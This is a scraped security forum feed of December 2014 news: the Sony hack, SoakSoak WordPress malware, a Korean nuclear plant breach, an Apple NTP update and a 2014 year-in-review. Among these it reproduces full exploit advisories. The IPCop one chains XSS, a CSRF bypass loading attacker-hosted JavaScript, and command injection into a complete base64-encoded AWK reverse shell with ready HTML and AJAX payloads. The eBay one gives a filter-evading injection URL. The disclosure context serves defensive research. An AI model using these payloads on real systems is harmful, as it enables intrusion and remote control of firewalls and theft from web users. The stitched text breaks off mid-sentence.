Aerosol

Sony was forced to pull the cinema release of "The Interview," scheduled for Christmas day, after hacker group Guardians of Peace (GOP) threatened to attack any theater that decided to show the film. But the studio will release the controversial North Korean-baiting film via different alternatives. HACKERS WARNED OF TERROR ATTACK The massive hacking attack against Sony Pictures Entertainment is getting worst day by day. The hack has yet exposed about 200 gigabytes of confidential data belonging to the company from upcoming movie scripts to sensitive employees data, celebrities phone numbers and their travel aliases, and also the high-quality versions of 5 newest films leak, marking it as the most severe hack in the History. Week back, the hacker group GOP, who has claimed responsibility for the damaging Sony cyber-attack, demanded Sony to cancel the release of "The Interview" — the Seth Rogen and James Franco-starring comedy centered around a TV host and his producer assassinating North Korean dictator Kim Jong Un, citing terror threats against movie theatres. At the beginning of the month when GoP group send a threatening email to Sony executives, they didn't even ask the company to cancel the release of The Interview movie. They never released any statement regarding the movie, but later with second hack they actually demand for the same. It seems that hackers got this TIP from media suggestions and put all the blame to North Korea for making this Drama more interesting. PULLING THE INTERVIEW – A VERY COWARD ACTION Not just GOP, the studio has been threatened by a number of hackers group including a group identifying itself as Anonymous. In a statement on Monday to Sony Entertainment CEO Michael Lynton, the hackers group warned the studio to release "The Interview" as originally planned, or else face more damaging hacks. The Anonymous group also denies that the Sony hackers are linked to North Korea, despite the FBI’s revelation Friday that their probe had determined as much. The group criticized Sony for pulling the movie, saying it was a "very cowardly" act of both the CEO and the organization, alleging it showed "panicking at first sight of trouble." In fact, President Barack Obama also expressed disappointment in Sony’s decision to pull the film and announced Friday that the studio had made "a mistake" by withdrawing the movie, but said it was the private company's right to do so. SONY INTENDS TO RELEASE THE INTERVIEW In response, Michael Lynton, the studio’s chief executive, said that it had "not caved" to hackers who harmed the company and that the studio itself intends to release its controversial film and exploring ways to let audiences see the film, possibly Youtube.. BITTORRENT CAME UP WITH A GOOD IDEA Meanwhile, the popular file-sharing giant BitTorrent has suggested Sony a way to release the controversial film using its new alternative digital-distribution paygate for artists, BitTorrent Bundle, a paid service. The San Francisco-based company believes BitTorrent Bundle is the best way to satisfy both online downloaders and Sony’s desire to release the film. According to BitTorrent, it's a totally "safe and legal way" for Sony to release "The Interview", with up to 20,000 creators and rights holders currently using the publishing platform. Notably, BitTorrent Bundle had released "The Act Of Killing," a 2012 Oscar-nominated documentary account of mass murder in 1960s Indonesia that stirred controversy for criticizing government officials. The feature was downloaded over 3.5 million times. Now, let’s wait and watch what Sony decides about BitTorrent offer, but it is very clear that the studio has never been a fan of torrents and if the company accept the offer from the file-sharing giant then it would be an unlikely deal. But this deal sounds to be a convenient one both for Sony and viewers. Source

The attackers behind the SoakSoak malware campaign are continuing to modify their tactics and have infected a new group of Web sites. The Javascript code that the attackers target with the malware has also changed. Last week, Google took the step of blacklisting thousands of sites that had been infected by SoakSoak. The malware is targeting WordPress sites and the attackers can inject their malicious code into various Javascript files. Originally, the attackers were targeting wp-includes/template-loader.php, and once the file is modified, the attackers’ Javascript can appear on every page on an infected site. That code will then download malware from a remote domain. The attackers have now begun targeting a different file, wp-includes/js/json2.min.js, which is being modified to load a malicious Flash file. “The hidden iFrame URL in swfobjct.swf now depends on another script from hxxp://ads .akeemdom . com/db26, also loaded by malware in json2.min.js,” researchers at Sucuri wrote in an analysis of the attack. The SoakSoak malware campaign is targeting older versions of a popular WordPress plugin called RevSlider. Versions prior to 4.2 are being exploited, Denis Sinegubko of Sucuri said. The vulnerability in the plugin was disclosed several months ago and was discussed on underground forums. “The biggest issue is that the RevSlider plugin is a premium plugin, it’s not something everyone can easily upgrade and that in itself becomes a disaster for website owner. Some website owners don’t even know they have it as it’s been packaged and bundled into their themes,” Daniel Cid of Sucuri wrote last week. The vulnerability was patched silently by the plugin’s developers, but sites that have not been updated are still vulnerable to these kinds of attacks. Source

tinc is a Virtual Private Network (VPN) daemon that uses tunneling and encryption to create a secure private network between multiple hosts on the Internet. This tunneling allows VPN sites to share information with each other over the Internet without exposing any information. Changes: Documentation updates. Support linking against -lresolv on Mac OS X. Fixed scripts on Windows when using the ScriptsInterpreter option. Allowed a minimum reconnect timeout to be specified. Added support to PriorityInheritance on IPv6 sockets. Download

###################################################################### # Exploit Title: IPCop <= 2.1.4 XSS to CSRF to Remote Command Execution # Date: 21/12/2014 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.ipcop.org - www.ipcop.org/download.php # Version: 2.1.4 # Category: Remote Command Execution # Google dork: # Tested on: IPCop distribution ###################################################################### IPCop firewall/router distribution description : ====================================================================== IPCop is a Linux distribution which aims to provide a simple-to-manage firewall appliance based on PC hardware. IPCop is a stateful firewall built on the Linux netfilter framework. Originally a fork of the SmoothWall Linux firewall, the projects are developed independently, and have now diverged significantly. IPCop includes a simple, user managed update mechanism to install security updates when required. In version <= 2.1.4 of the distribution, different vulnerabilities can be used to gain a Remote Command Execution (reverse-shell). In version <= 2.1.2 of the distribution, a Reflected XSS is available. Through this RXSS, the full reverse-shell can be obtained with only one URL. Proof of Concept 1 : ====================================================================== A non-persistent XSS in GET param is available in the ipinfo.cgi. The injection can be URLencoded with certain browsers. This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade). File /home/httpd/cgi-bin/ipinfo.cgi line 82 : &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname); PoC: https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>alert('XSS_by_Yann_CAM')</script> Proof of Concept 2 : ====================================================================== CSRF exploit bypass from previous XSS. IPCop is protected against CSRF attack with a referer checking on all page. It's possible to bypass this protection with the previous XSS detailed. To do this, load a third party JS script with the XSS, and make Ajax request over IPCop context (so with the right referer). This XSS works on IE and affect IPCop version <= 2.1.2 (patched in 2.1.3 upgrade). File /home/httpd/cgi-bin/ipinfo.cgi line 82 : &Header::openbox('100%', 'left', $addr . ' (' . $hostname . ') : '.$whoisname); PoC : Host a third party JS script on a web server accessible from IPCop. In this JS script, load JQuery dynamically and perform any AJAX request to an IPCop targeted page. All AJAX request bypass the CSRF protection. * Third party JS script, host in http://<PENTESTER_WEBSITE>/x.js: var headx=document.getElementsByTagName('head')[0]; var jq= document.createElement('script'); jq.type= 'text/javascript'; jq.src= 'http://code.jquery.com/jquery-latest.min.js'; headx.appendChild(jq); // jquery dynamic loading function loadX(){ $.ajax({ type: 'POST', url: "https://<IPCop_IP>:8443/cgi-bin/<TARGETED_PAGE>", contentType: 'application/x-www-form-urlencoded;charset=utf-8', dataType: 'text', data: '<YOUR_DATA>' }); // payload of your choice } setTimeout("loadX()",2000); * XSS to load dynamically this third party script : var head=document.getElementsByTagName('head')[0];var script= document.createElement('script');script.type= 'text/javascript';script.src= 'http://<PENTESTER_WEBSITE>/x.js';head.appendChild(script); * Escape this string with escape() Javascript method : %76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09 * Make the final URL with XSS in GET param that load dynamically the third party script (IE) : https://<IPCop_IP>:8443/cgi-bin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%74%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%73%63%72%69%70%74%2E%74%79%70%65%3D%20%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%3B%73%63%72%69%70%74%2E%73%72%63%3D%20%27%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%35%33%2E%31%2F%78%2E%6A%73%27%3B%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0A%09%09%09"))</script> Proof of Concept 3 : ====================================================================== Remote Command Execution in the iptablesgui.cgi file. This file is protected from CSRF execution. Affected version <= 2.1.4 (patched in 2.1.5 upgrade). File /home/httpd/cgi-bin/iptablesgui.cgi line 99 (and also 102) : $output = `/usr/local/bin/iptableswrapper $cgiparams{'TABLE'} 2>&1`; The $cgiparams{'TABLE'} isn't sanitized before execution in command line. It's possible to change the "TABLE" post data with arbitrary data. To chain commands in this instruction, only || are usable (not && nor . So the first part of the command needs to return a false status. It can be done with no additional param : /usr/local/bin/iptableswrapper <NOTHING HERE> || <my personnal command will be executed here> So the RCE can be exploited with this PoC (if the Referer is defined to IPCop URL) : <html> <body> <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'> <input type='hidden' name='TABLE' value='||touch /tmp/x;#' /> <input type='hidden' name='CHAIN' value='' /> <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' /> </form> <script>document.forms['x'].submit();</script> </body> </html> Note that the ACTION POST param depend on the IPCop language defined. Proof of Concept 4 : ====================================================================== Finally, with these three previous PoC, it's possible to combine all the mechanisms to gain a full reverse-shell on IPCop. IPCop does not have netcat nor telnet, socat, python, ruby, php etc ... The only way to make a reverse-shell is to use Perl or AWK technics. In this PoC, it's the AWK technic that is used : (From ASafety Reverse-shell cheat-sheet : http://www.asafety.fr/vuln-exploit-poc/pentesting-etablir-un-reverse-shell-en-une-ligne/) * The reverse-shell one-line with AWK is : awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null * To bypass IPCop filter, you need to encode this command in base64 (after modify <IP> and <PORT>) : YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWxlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIGM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8JiBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsgfX0nIC9kZXYvbnVsbA== * Place a \n at each bloc of 64 chars in the base64 version : YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA== * This payload can be echo'ed and decoded with openssl, on the fly, into IPCop : echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d * To execute this payload, add backticks and eval call : eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d` * Your payload is ready to be used into TABLE POST param in iptablesgui.cgi, like the previous PoC : ||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;# * Full PoC (IPCop <= 2.1.2, RXSS patched in 2.1.3 upgrade but RCE available to 2.1.4, patched in 2.1.5 upgrade) (if the referer is defined to IPCop URL, and a netcat is listening # nc -l -vv -p 1337) : <html> <body> <form name='x' action='https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi' method='post'> <input type='hidden' name='TABLE' value='||eval `echo -e "YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA==" | openssl enc -a -d`;#' /> <input type='hidden' name='CHAIN' value='' /> <input type='hidden' name='ACTION' value='Rafra%C3%AEchir' /> </form> <script>document.forms['x'].submit();</script> </body> </html> Note that none <IP>/<Port> are defined in the previous payload, you need to reproduce these different steps. * With the XSS method to bypass CSRF Referer checking, the third party JS script can be : var headx=document.getElementsByTagName('head')[0]; var jq= document.createElement('script'); jq.type= 'text/javascript'; jq.src= 'http://code.jquery.com/jquery-latest.min.js'; headx.appendChild(jq); function loadX(){ $.ajax({ type: 'POST', url: "https://<IPCop_IP>:8443/cgi-bin/iptablesgui.cgi", contentType: 'application/x-www-form-urlencoded;charset=utf-8', dataType: 'text', data: 'CHAIN=&ACTION=Rafra%C3%AEchir&TABLE=%7C%7Ceval+%60echo+-e+%22YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC88SVA+LzxQT1JUPiI7IHdoaWx\nlKDQyKSB7IGRveyBwcmludGYgInNoZWxsPiIgfCYgczsgcyB8JiBnZXRsaW5lIG\nM7IGlmKGMpeyB3aGlsZSAoKGMgfCYgZ2V0bGluZSkgPiAwKSBwcmludCAkMCB8J\niBzOyBjbG9zZShjKTsgfSB9IHdoaWxlKGMgIT0gImV4aXQiKSBjbG9zZShzKTsg\nfX0nIC9kZXYvbnVsbA%22%22+%7C+openssl+enc+-a+-d%60%3B%23' }); } setTimeout("loadX()",2000); * A demonstration video has been realised as PoC here (IPCop 2.0.6 but work on IPCop 2.1.2) : https://www.youtube.com/watch?v=ovhogZGHyMg Solution: ====================================================================== - To patch the RXSS, install IPCop >= 2.1.3 or upgrade to 2.1.3. - To patch the RCE, install IPCop >= 2.1.5 or upgrade to 2.1.5. Report timeline : ====================================================================== 2013-03-31 : Team alerted with details, PoC and video (via Sourceforge) 2013-04-09 : Second alert sent to the team (via Sourceforge) 2013-04-25 : Third alert sent to the IPCop english support forum 2013-04-25 : PoC added in private on the sourceforge bug tracker, no response 2013-04-30 : Ticket priority change from 5 to 8, no response. 2014-02-13 : IPCop 2.1.1 released, RXSS not fixed, RCE not fixed, no news on ticket. 2014-03-03 : IPCop 2.1.2 released, RXSS not fixed, RCE not fixed, no news on ticket. 2014-04-03 : IPCop 2.1.3 released, RXSS fixed, RCE not fixed, no news on ticket. 2014-04-08 : IPCop 2.1.4 released, RXSS fixed, RCE not fixed, no news on ticket. 2014-05-02 : IPCop 2.1.5 released, RXSS fixed, RCE fixed, no news on ticket. 2014-12-21 : Public article on ASafety and public advisory Additional resources : ====================================================================== - www.ipcop.org - sourceforge.net/p/ipcop/bugs/807/ - sourceforge.net/projects/ipcop/ - www.synetis.com - www.asafety.fr - www.asafety.fr/vuln-exploit-poc/xss-rce-ipcop-2-1-4-remote-command-execution - www.youtube.com/watch?v=ovhogZGHyMg Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: www.synetis.com | www.asafety.fr Source

###################################################################### # Exploit Title: eBay.com ocsnext sub-domain Reflected CSS injection # Date: 20/12/2014 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: www.ebay.com # Version: / # Category: Reflected CSS injection # Google dork: # Tested on: eBay.com ocsnext sub-domain ###################################################################### Adobe description : ====================================================================== eBay Inc., is an American multinational corporation and e-commerce company, providing consumer-to-consumer & business-to-consumer sales services via Internet. It is headquartered in San Jose, California, United States. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. Vulnerability description : ====================================================================== A CSS injection is available in the ocsnext.ebay.com sub-domain. Through this vulnerability, an attacker could tamper with page rendering, and potentially injects JavaScript to generate Reflected XSS (RXSS) to redirect victims to fake eBay portals, or capture eBay's users credentials such cookies. This CSS injection is on GET "query" variable and is not properly sanitized before being used to his page. Proof of Concept 1 : ====================================================================== A non-persistent CSS injection and potentially RXSS in "query" GET param is available in the ocsnext.ebay.com sub-domain. Test with FireFox 30.0 and Chrome 36.0.1985.125. Using eBay's services, the vulnerability injection (HTML, CSS and JavaScript potentially) affect a page of ocsnext.ebay.com domain (*.ebay.com) once authenticated. The injection is used to define arbitrary attributes on an input tag type "hidden": <input type="hidden" name="query" value="[INJECTION]" /> It is possible to define the "style" attribute to load the CSS on the fly and possibly make XSS based browsers and their versions (-moz-binding, expression(), background-image: url(javascript:) ) ... Chars like "<" or ">" are encoded, and strings like "http://" are filtered. To evade the "http://" filter, evasion vector "http:/%26%23x0D%3B/" is used. PoC: http://ocsnext.ebay.com/ocs/cusr?query=x" style="background-image:url('http:/%26%23x0D%3B/www.asafety.fr/images/logo.png')&domain=TechnicalIssues&from=404_error Screenshots : ====================================================================== - http://www.asafety.fr/data/20140721-ebay_css_injection_01.png Solution: ====================================================================== Fixed by eBay / PayPal / Magento security team. Additional resources : ====================================================================== - http://www.ebay.com/ - http://ebay.com/securitycenter/ResearchersAcknowledgement.html - http://www.asafety.fr/vuln-exploit-poc/contribution-ebay-css-injection-xss-potentielle/ - http://www.synetis.com/2014/08/22/contribution-securite-debay/ Report timeline : ====================================================================== 2014-07-21 : eBay Team alerted with details and PoC. 2014-07-21 : eBay response and ack. 2014-07-21 : eBay validate the issue and awaiting fix. 2014-08-21 : eBay fixed the issue and acknowledgement 2014-08-22 : Public article on SYNETIS website. 2014-12-20 : Public article and PoC on ASafety website 2014-12-20 : Public advisory Credits : ====================================================================== 88888888 88 888 88 88 888 88 88 788 Z88 88 88.888888 8888888 888888 88 8888888. 888888. 88 88 888 Z88 88 88 88 88 88 88 8888888 88 88 88 88 88 88 88 88 888 888 88 88 88 88 88888888888 88 88 888888 88 88 88 8. 88 88 88 88 88 888 888 ,88 8I88 88 88 88 88 88 88 .88 .88 ?8888888888. 888 88 88 88888888 8888 88 =88888888 888. 88 88 www.synetis.com 8888 Consulting firm in management and information security Yann CAM - Security Consultant @ Synetis | ASafety -- SYNETIS | ASafety CONTACT: www.synetis.com | www.asafety.fr Source

Un hacker bun e ala care nu isi face publicitate ( adica sta in underground ). Un hacker bun nu e cel care sparge multe site-uri, un hacker bun e acela ce se protejeaza pe el insusi!

The wonderful and terrifying thing about the security world is that things never stay calm for long. As soon as you think you have a chance to catch your breath, someone breaks something and it’s time to scramble again. In 2014, those small moments of downtime were hard to come by. There was a seemingly endless parade of major vulnerabilities, data breaches and high-profile hacks. It was a year filled with Heartbleeds, POODLEs, Shellshock and a lot of pain for users, administrators and anyone else who likes to do things on the Interweb. Thankfully, the network is still standing after all that, so we went back and looked at all the stories we did this year and picked out the 10 most popular ones, put a fresh coat of paint on them and put them together to give you a picture of the year that was in security. Enjoy. PNG Image Metadata Leading to iFrame Injections If there’s one thing attackers love, it’s Javascript. It’s the gift that keeps on giving and in 2014 one of the presents it gave us was the ability to deliver malware through the use of the metadata in an obfuscated PNG image file. Researchers at Sucuri discovered that some attackers were using the technique to trigger an iframe that calls the image’s metadata, which is outside the browser’s viewing area. The browser can still read the data though and can be used in drive-by downloads and other attacks. Easy workaround: Don’t look at pictures on the Internet. Seriousness of OpenSSL Heartbleed Bug Sets In As Code Red once was the standard for Internet worms, Heartbleed has become the bar to which other Internet-wide bugs must now aspire. The vulnerability in the heartbeat extension of OpenSSL caused Web-wide panic when it was disclosed in April and its effects are still being felt eight months later. OpenSSL is deployed in an untold number of products, and the bug affects both clients and servers, so attackers had a Cheesecake Factory menu of targets at their disposal. Rumors of Heartbleed’s discovery by the NSA appear to be exaggerated, but the bug can be blamed for starting the vulnerability-as-celebrity trend. So, thanks, Heartbleed. Major Bash Vulnerability Affects Linux, UNIX, Mac OS X These are not words you want to hear when a new vulnerability is disclosed: “It’s super simple and…It’s extremely serious.” That’s how a security engineer at Red Hat described the Shellshock flaw in the Bash command line tool, a bug that affected Unix, Linux and OS X and allows attackers to execute whatever code they want on target systems. Which, as it turns out, is undesirable. Vendors scrambled to patch their products, while hackers did what they do: hack. Shellshock also carried on the proud tradition of vulnerability branding and logo production. Browser Vendors Move to Disable SSLv3 in Wake of POODLE Attack 2014 was not a great year for SSL. And by not great, we mean terrible. Really, really terrible. As if the Heartbleed bug wasn’t enough, in October researchers from Google revealed a new attack on SSLv3 that could let attackers decrypt secure connections in some circumstances. In response to the disclosure, browser vendors have begun disabling SSLv3 support, a move that was long overdue. The protocol is older than half the kids trying to exploit it using POODLE. But news came out recently that TLS—the replacement for SSL—is also vulnerable to the attack in some implementations. But the good news is, well, nothing. Hacker Puts Hosting Service Code Spaces Out of Business Most high-profile attacks these days result in data being stolen and sometimes leaked online (see: Sony). But in June we saw an attack on Code Spaces, a hosting and collaboration platform provider, that forced the company to go out of business. The company was hit with a DDoS attack that was quickly followed by a compromise of its Amazon EC2 control panel. The hackers destroyed the company’s data, including its backups, and Code Spaces informed customers within a few hours that it was going to cease operations. This kind of devastating attack is a rarity, but not unique. Researcher Finds Tor Exit Node Adding Malware to Binaries Tor has become a safe haven for people eager to protect the privacy of their online activities. In turn, hackers have taken to Tor not only to carry out DDoS and spam campaigns, but also to load malware on unsuspecting users’ machines. Security researcher Josh Pitts in October identified a Tor exit node that was surreptitiously adding malware to binaries users downloaded using the Tor browser. The exit node was subsequently flagged by the Tor Project, but not before it infected machines with code that opened ports listening for commands and sent HTTP requests to a remote server. The Internet is Broken, Act Accordingly Now that the curtain has been thrown back on the depth and breadth of government surveillance of Internet activities, the time has come to heed some cautious advice: Behave online as if someone is monitoring you—because they are. Security researchers are particularly aware of this dynamic because their work is of keen interest to intelligence outfits, hackers and defenders—all of whom would like to know what they know. No one can afford to be complacent or indifferent to Internet threats, whether they’re state-sponsored or criminally motivated. As Kaspersky Lab senior research Costin Raiu advises: The Internet is broken, act accordingly. Passcode Bypass Bug and Email Attachment Encryption Plague iOS 7.1.1 An Egyptian neurosurgeon and self-proclaimed baseband hacker disclosed the details of an iPhone lockscreen bypass technique that allows an attacker in physical possession of an Apple iPhone 5 device running iOS 7.1.1 at the time to access contacts and make phone calls. The vulnerability allows an attacker to bypass not only the lockscreen, but also the new TouchID fingerprint sensor that arrived with the latest iPhones. The trick to beating these protections is to use the device’s voice-recognition program Siri which after some prompting, presented the good doctor with the ability to scroll through contacts. The Siri bug was a double whammy for Apple, which also had to deal with a separate issue in iOS 7.1.1 that prevented email attachments from being properly encrypted. Both issues were patched. UltraDNS Dealing With DDoS Attack Big DNS service provider UltraDNS in April was put on its heels having to beat back a DDoS attack that kept many of its customers offline. It was a hectic day for website operators who relied on UltraDNS’ services. Ultimately, it turned out that a massive 100 Gbps DDoS attack against one of UltraDNS’ customers resulted in latency issues for others. The attack against UltraDNS was just the latest volumetric DDoS attack to be reported. Attacks ranging between 70 Gbps and more than 400 Gbps were happening with greater frequency against high value financial targets, as well as core infrastructure providers such as UltraDNS. Many such DNS amplification attacks take advantage of the millions of open DNS resolvers listening online to amplify traffic exponentially, spoofing requests to the intended target. UltraDNS mitigated its situation within hours. Audit Project Releases Verified Repositories of TrueCrypt 7.1A In a year of bizarre stories, hacks and Internet-wide vulnerabilities, there may not have been a stranger story than in May the abrupt shutdown of TrueCrypt, the popular open source encryption software package. TrueCrypt’s maintainers’ decision to shut down the project kicked off speculation about whether the software had been hacked or infiltrated by the National Security Agency. In an attempt to get some answers, the Open Crypto Audit Project was formed with the express mission of auditing the TrueCrypt code looking for a backdoor. In June, OCAP posted a verified repository of TrueCrypt 7.1a, the last known good TrueCrypt archive. The experts involved in the project created the verified repository by comparing the SHA2 hashes with files found in other TrueCrypt repositories, ensuring their integrity. Source

@MrGrj prin acest post nu ai facut nimic decat sa le dau acelor ratati satisfactie ( se simt si ei cineva ) oamenii de genul nu trebuie bagati in seama!

Computers at a nuclear power plant in South Korea have been compromised by a hacker, but the plant's operator says no critical data has been leaked. The hacker was able to access blueprints, floor maps and other information on the plant, the South Korean Yonhap News Agency reported Sunday. Using a Twitter account called "president of anti-nuclear reactor group," the hacker has released a total of four postings of the leaked data since December 15, each one revealing internal designs and manuals of the Gori-2 and Wolsong-1 nuclear reactors run by Korea Hydro and Nuclear Power Co. (KHNP), Yonhap added. The hacker has threatened to leak further information unless the reactors are shut down. KHNP has insisted that the leaked information is not critical and does not undermine the safety of the reactors. The company also played down the threat of any type of cyberattack, saying that the reactors' controllers are protected because they're not linked to any external networks, according to the Wall Street Journal. The hacking against KHNP nuclear plants occurs in the midst of a major hack against Sony Pictures over its movie "The Interview," a comedy about an assassination attempt against North Korean leader Kim Jong-un. The FBI has accused North Korea of orchestrating the Sony hack, though the country has denied any involvement. As a further response, North Korea suggested a joint investigation into the hack with the US but then accused the US of being involved in the making of the film, according to The Guardian. Despite the increased tension, no fingers have been pointed at North Korea for the hacking against the KHNP power plants. An official at KHNP told Reuters that the hacking appeared to be the work of "elements who want to cause social unrest," but added that he had no one specific in mind. Government officials looking into the incident were able to trace the hacker's IP address to a PC located in a specific location, Yonhap said. Investigators have been sent to the location as well as to the plant's reactors to probe further. Source

Apple is updating its Macs to guard against hackers taking control -- the first time a Mac update has been sent out automatically without requiring your permission. The automated security update protects Apple laptops and desktops from newly discovered security vulnerability CVE-2014-9295, which affects OS X and other Linux and Unix distributions. Speaking to Reuters, Apple spokesperson Bill Evans described Monday's update as "seamless" and noted that Mac users don't even need to restart their computers. Apple isn't the only company that could be vulnerable to the security bug, which was revealed Friday by the US Department of Homeland Security and the Carnegie Mellon University Software Engineering Institute. Researchers warn that vulnerabilities in a computer's network time protocol (NTP), which sync a computer's clocks, could allow hackers to take control of a computer remotely. "Apple's proactive steps to automatically remediate this particular vulnerability shows the need to quickly patch remotely exploitable vulnerabilities," says security analyst Ken Westin of Tripwire. "However, the use of Apple's automatic deployment tool is not without risks, as even the simplest update can cause problems for some systems. In this case the update may have been so minor the risk of affecting other applications and processes was minimal." Previously, Apple's security updates have required a computer user to accept the update. The company has actually had a method to automatically update computers for two years but is only now using it for the first time. What if someone doesn't want automatic updates? Westin advises: "If you have a Mac system where an automatic update might introduce a problem -- or you are the paranoid type -- it can be disabled by going to the Apple Menu > System Preferences > App Store and unchecking Install system data files and security updates." Source

Document Title: =============== iWifi for Chat v1.1 iOS - Denial of Service Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1375 Release Date: ============= 2014-12-16 Vulnerability Laboratory ID (VL-ID): ==================================== 1376 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== iWifi for Chat lets you easily chat with your friends over Wifi in a fast and reliable way. The app is part of a bundle and is made by the seller ios developer. (Copy of the Vendor Homepage: https://itunes.apple.com/us/app/iwifi-for-chat/id512703175 ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research team discovered a remote denial of service vulnerability in the iWifi for Chat v1.1 iOS web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-16: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== iOS Developer Product: iWifi for Chat - iOS Web Application 1.1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A remote denial of service vulnerbaility has been 